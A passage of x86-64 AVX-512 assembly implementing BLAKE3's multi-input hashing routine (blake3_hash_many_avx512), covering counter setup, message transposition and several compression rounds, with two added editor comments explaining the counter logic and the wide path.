#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_avx512:
blake3_hash_many_avx512:
_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 144
and rsp, 0xFFFFFFFFFFFFFFC0
neg r9
kmovw k1, r9d
vmovd xmm0, r8d
vpbroadcastd ymm0, xmm0
shr r8, 32
vmovd xmm1, r8d
vpbroadcastd ymm1, xmm1
vmovdqa ymm4, ymm1
vmovdqa ymm5, ymm1
vpaddd ymm2, ymm0, ymmword ptr [ADD0+rip]
vpaddd ymm3, ymm0, ymmword ptr [ADD0+32+rip]
vpcmpltud k2, ymm2, ymm0
vpcmpltud k3, ymm3, ymm0
vpaddd ymm4 {k2}, ymm4, dword ptr [ADD1+rip] {1to8}
vpaddd ymm5 {k3}, ymm5, dword ptr [ADD1+rip] {1to8}
knotw k2, k1
vmovdqa32 ymm2 {k2}, ymm0
vmovdqa32 ymm3 {k2}, ymm0
vmovdqa32 ymm4 {k2}, ymm1
vmovdqa32 ymm5 {k2}, ymm1
vmovdqa ymmword ptr [rsp], ymm2
vmovdqa ymmword ptr [rsp+0x1*0x20], ymm3
vmovdqa ymmword ptr [rsp+0x2*0x20], ymm4
vmovdqa ymmword ptr [rsp+0x3*0x20], ymm5
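# Editor note (not in the original): the scratch area at rsp now caches
# per-lane 64-bit block counters as separate low/high dword vectors; the
# vpcmpltud results above propagate carries into the high halves, and k1
# (built from the increment_counter flag passed in r9) gates whether the
# per-lane counter offsets are applied at all.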
shl rdx, 6
mov qword ptr [rsp+0x80], rdx
cmp rsi, 16
jc 3f
2:
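# Editor note (not in the original): wide path. Sixteen inputs are hashed
# in parallel, message words transposed across the zmm lanes, one 64-byte
# block per pass of the 9: loop below.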
vpbroadcastd zmm0, dword ptr [rcx]
vpbroadcastd zmm1, dword ptr [rcx+0x1*0x4]
vpbroadcastd zmm2, dword ptr [rcx+0x2*0x4]
vpbroadcastd zmm3, dword ptr [rcx+0x3*0x4]
vpbroadcastd zmm4, dword ptr [rcx+0x4*0x4]
vpbroadcastd zmm5, dword ptr [rcx+0x5*0x4]
vpbroadcastd zmm6, dword ptr [rcx+0x6*0x4]
vpbroadcastd zmm7, dword ptr [rcx+0x7*0x4]
movzx eax, byte ptr [rbp+0x38]
movzx ebx, byte ptr [rbp+0x40]
or eax, ebx
xor edx, edx
.p2align 5
9:
movzx ebx, byte ptr [rbp+0x48]
or ebx, eax
add rdx, 64
cmp rdx, qword ptr [rsp+0x80]
cmove eax, ebx
mov dword ptr [rsp+0x88], eax
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x40]
mov r13, qword ptr [rdi+0x48]
mov r14, qword ptr [rdi+0x50]
mov r15, qword ptr [rdi+0x58]
vmovdqu32 ymm16, ymmword ptr [rdx+r8-0x2*0x20]
vinserti64x4 zmm16, zmm16, ymmword ptr [rdx+r12-0x2*0x20], 0x01
vmovdqu32 ymm17, ymmword ptr [rdx+r9-0x2*0x20]
vinserti64x4 zmm17, zmm17, ymmword ptr [rdx+r13-0x2*0x20], 0x01
vpunpcklqdq zmm8, zmm16, zmm17
vpunpckhqdq zmm9, zmm16, zmm17
vmovdqu32 ymm18, ymmword ptr [rdx+r10-0x2*0x20]
vinserti64x4 zmm18, zmm18, ymmword ptr [rdx+r14-0x2*0x20], 0x01
vmovdqu32 ymm19, ymmword ptr [rdx+r11-0x2*0x20]
vinserti64x4 zmm19, zmm19, ymmword ptr [rdx+r15-0x2*0x20], 0x01
vpunpcklqdq zmm10, zmm18, zmm19
vpunpckhqdq zmm11, zmm18, zmm19
mov r8, qword ptr [rdi+0x20]
mov r9, qword ptr [rdi+0x28]
mov r10, qword ptr [rdi+0x30]
mov r11, qword ptr [rdi+0x38]
mov r12, qword ptr [rdi+0x60]
mov r13, qword ptr [rdi+0x68]
mov r14, qword ptr [rdi+0x70]
mov r15, qword ptr [rdi+0x78]
vmovdqu32 ymm16, ymmword ptr [rdx+r8-0x2*0x20]
vinserti64x4 zmm16, zmm16, ymmword ptr [rdx+r12-0x2*0x20], 0x01
vmovdqu32 ymm17, ymmword ptr [rdx+r9-0x2*0x20]
vinserti64x4 zmm17, zmm17, ymmword ptr [rdx+r13-0x2*0x20], 0x01
vpunpcklqdq zmm12, zmm16, zmm17
vpunpckhqdq zmm13, zmm16, zmm17
vmovdqu32 ymm18, ymmword ptr [rdx+r10-0x2*0x20]
vinserti64x4 zmm18, zmm18, ymmword ptr [rdx+r14-0x2*0x20], 0x01
vmovdqu32 ymm19, ymmword ptr [rdx+r11-0x2*0x20]
vinserti64x4 zmm19, zmm19, ymmword ptr [rdx+r15-0x2*0x20], 0x01
vpunpcklqdq zmm14, zmm18, zmm19
vpunpckhqdq zmm15, zmm18, zmm19
vmovdqa32 zmm27, zmmword ptr [INDEX0+rip]
vmovdqa32 zmm31, zmmword ptr [INDEX1+rip]
vshufps zmm16, zmm8, zmm10, 136
vshufps zmm17, zmm12, zmm14, 136
vmovdqa32 zmm20, zmm16
vpermt2d zmm16, zmm27, zmm17
vpermt2d zmm20, zmm31, zmm17
vshufps zmm17, zmm8, zmm10, 221
vshufps zmm30, zmm12, zmm14, 221
vmovdqa32 zmm21, zmm17
vpermt2d zmm17, zmm27, zmm30
vpermt2d zmm21, zmm31, zmm30
vshufps zmm18, zmm9, zmm11, 136
vshufps zmm8, zmm13, zmm15, 136
vmovdqa32 zmm22, zmm18
vpermt2d zmm18, zmm27, zmm8
vpermt2d zmm22, zmm31, zmm8
vshufps zmm19, zmm9, zmm11, 221
vshufps zmm8, zmm13, zmm15, 221
vmovdqa32 zmm23, zmm19
vpermt2d zmm19, zmm27, zmm8
vpermt2d zmm23, zmm31, zmm8
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x40]
mov r13, qword ptr [rdi+0x48]
mov r14, qword ptr [rdi+0x50]
mov r15, qword ptr [rdi+0x58]
vmovdqu32 ymm24, ymmword ptr [r8+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r12+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r9+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r13+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm8, zmm24, zmm25
vpunpckhqdq zmm9, zmm24, zmm25
vmovdqu32 ymm24, ymmword ptr [r10+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r14+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r11+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r15+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm10, zmm24, zmm25
vpunpckhqdq zmm11, zmm24, zmm25
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r12+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r13+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r14+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
prefetcht0 [r15+rdx+0x80]
mov r8, qword ptr [rdi+0x20]
mov r9, qword ptr [rdi+0x28]
mov r10, qword ptr [rdi+0x30]
mov r11, qword ptr [rdi+0x38]
mov r12, qword ptr [rdi+0x60]
mov r13, qword ptr [rdi+0x68]
mov r14, qword ptr [rdi+0x70]
mov r15, qword ptr [rdi+0x78]
vmovdqu32 ymm24, ymmword ptr [r8+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r12+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r9+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r13+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm12, zmm24, zmm25
vpunpckhqdq zmm13, zmm24, zmm25
vmovdqu32 ymm24, ymmword ptr [r10+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r14+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r11+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r15+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm14, zmm24, zmm25
vpunpckhqdq zmm15, zmm24, zmm25
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r12+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r13+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r14+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
prefetcht0 [r15+rdx+0x80]
vshufps zmm24, zmm8, zmm10, 136
vshufps zmm30, zmm12, zmm14, 136
vmovdqa32 zmm28, zmm24
vpermt2d zmm24, zmm27, zmm30
vpermt2d zmm28, zmm31, zmm30
vshufps zmm25, zmm8, zmm10, 221
vshufps zmm30, zmm12, zmm14, 221
vmovdqa32 zmm29, zmm25
vpermt2d zmm25, zmm27, zmm30
vpermt2d zmm29, zmm31, zmm30
vshufps zmm26, zmm9, zmm11, 136
vshufps zmm8, zmm13, zmm15, 136
vmovdqa32 zmm30, zmm26
vpermt2d zmm26, zmm27, zmm8
vpermt2d zmm30, zmm31, zmm8
vshufps zmm8, zmm9, zmm11, 221
vshufps zmm10, zmm13, zmm15, 221
vpermi2d zmm27, zmm8, zmm10
vpermi2d zmm31, zmm8, zmm10
vpbroadcastd zmm8, dword ptr [BLAKE3_IV_0+rip]
vpbroadcastd zmm9, dword ptr [BLAKE3_IV_1+rip]
vpbroadcastd zmm10, dword ptr [BLAKE3_IV_2+rip]
vpbroadcastd zmm11, dword ptr [BLAKE3_IV_3+rip]
vmovdqa32 zmm12, zmmword ptr [rsp]
vmovdqa32 zmm13, zmmword ptr [rsp+0x1*0x40]
vpbroadcastd zmm14, dword ptr [BLAKE3_BLOCK_LEN+rip]
vpbroadcastd zmm15, dword ptr [rsp+0x22*0x4]
vpaddd zmm0, zmm0, zmm16
vpaddd zmm1, zmm1, zmm18
vpaddd zmm2, zmm2, zmm20
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm17
vpaddd zmm1, zmm1, zmm19
vpaddd zmm2, zmm2, zmm21
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm24
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm28
vpaddd zmm3, zmm3, zmm30
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm25
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm29
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm18
vpaddd zmm1, zmm1, zmm19
vpaddd zmm2, zmm2, zmm23
vpaddd zmm3, zmm3, zmm20
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm22
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm16
vpaddd zmm3, zmm3, zmm29
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm17
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm25
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm27
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm30
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm19
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm29
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm20
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm18
vpaddd zmm3, zmm3, zmm30
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm22
vpaddd zmm1, zmm1, zmm25
vpaddd zmm2, zmm2, zmm27
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm21
vpaddd zmm1, zmm1, zmm16
vpaddd zmm2, zmm2, zmm31
vpaddd zmm3, zmm3, zmm17
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm26
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm30
vpaddd zmm3, zmm3, zmm29
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm23
vpaddd zmm1, zmm1, zmm25
vpaddd zmm2, zmm2, zmm19
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm20
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm21
vpaddd zmm3, zmm3, zmm17
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm16
vpaddd zmm1, zmm1, zmm18
vpaddd zmm2, zmm2, zmm24
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm28
vpaddd zmm1, zmm1, zmm25
vpaddd zmm2, zmm2, zmm31
vpaddd zmm3, zmm3, zmm30
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm29
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm26
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm23
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm16
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
